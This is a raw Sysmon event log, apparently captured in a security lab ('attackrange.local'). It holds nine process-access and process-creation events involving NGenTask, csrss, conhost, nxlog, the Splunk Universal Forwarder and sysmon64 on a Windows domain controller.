{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6864,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.084\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010BF860900}\r\nSourceProcessId: 1172\r\nSourceThreadId: 3044\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nTargetProcessId: 4792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44575147)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.084","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010BF860900}","SourceProcessId":"1172","SourceThreadId":"3044","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","TargetProcessId":"4792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44575147)","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6865,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.084\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nTargetProcessId: 4792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.084","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","TargetProcessId":"4792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6866,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.084\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036870900}\r\nSourceProcessId: 4156\r\nSourceThreadId: 2180\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nTargetProcessId: 4792\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.084","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036870900}","SourceProcessId":"4156","SourceThreadId":"2180","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","TargetProcessId":"4792","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6867,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6868,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.913\r\nProcessGuid: {E2A3D6B1-12B5-5F25-0000-0010139E0900}\r\nProcessId: 5020\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.913","ProcessGuid":"{E2A3D6B1-12B5-5F25-0000-0010139E0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6869,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010139E0900}\r\nTargetProcessId: 5020\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010139E0900}","TargetProcessId":"5020","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6870,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010139E0900}\r\nTargetProcessId: 5020\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010139E0900}","TargetProcessId":"5020","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6871,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6872,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
